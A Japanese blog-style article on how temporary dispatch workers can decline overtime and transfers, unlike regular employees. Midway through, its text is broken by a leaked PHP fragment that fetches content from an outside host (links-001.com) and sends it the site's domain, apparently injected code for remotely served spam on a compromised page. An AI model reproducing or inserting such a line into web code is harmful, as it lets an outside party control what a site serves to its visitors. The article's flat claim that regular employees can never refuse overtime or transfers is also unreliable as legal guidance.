前へ
次へ

派遣は残業や転勤などを断る事ができる

会社勤めをしている方々は、たまに残業に関する悩みを抱えている事があります。
正社員の方々は、それで悩んでいる事も少なくありません。
残業をすれば、割増賃金は支払われます。
通常よりは給料は高めになりますが、あまり労働時間が長いのも大変です。
ストレスの原因にもなるでしょう。
ところで派遣という働き方の場合、その残業に関する大きなメリットがあります。
その働き方であれば、残業を断る事も可能だからです。
その点は、正社員とは大きく異なります。
厳密には、たまに残業を依頼されることはあります。
なかなか仕事が前に進まない時は、出向先の社員から仕事をお願いされる事はありますが、決して強制ではありません。
残業したくない時には、断る事も可能です。
ある意味、アルバイトに似ている一面もあります。
正社員と違って、アルバイトも残業を断る事ができますが、それと同様です。
ちなみに残業を引き受けた時には、もちろん時給も割増賃金になります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

ところが正社員という働き方の場合は、実は残業を断る事はできません。
会社の上司から残業を伝えられた時には、必ず従う必要があります。
正社員として働いている方は、たまにストレスを抱えている事もありますが、残業がその一因です。
残業を断る事もできませんから、ストレスが溜まってしまうケースも実際あります。
繁忙期の場合は、残業時間はかなり長くなってしまう事もあります。
しかし派遣という働き方の場合は、それも断れる訳です。
残業だけでなく、転勤も同様です。
正社員として働いていれば、たまに別の勤務先に転勤になる事はあります。
しかも正社員の場合は、その転勤を断る事はできません。
会社の上司から依頼された時には、必ず従う必要があります。
しかし派遣という働き方の場合は、それを断る事も可能です。
そもそも、出向先から転勤を依頼される事自体殆どありません。
基本的には、1つの勤務先で働き続けることができます。
それは派遣という働き方の魅力の1つです。

Page Top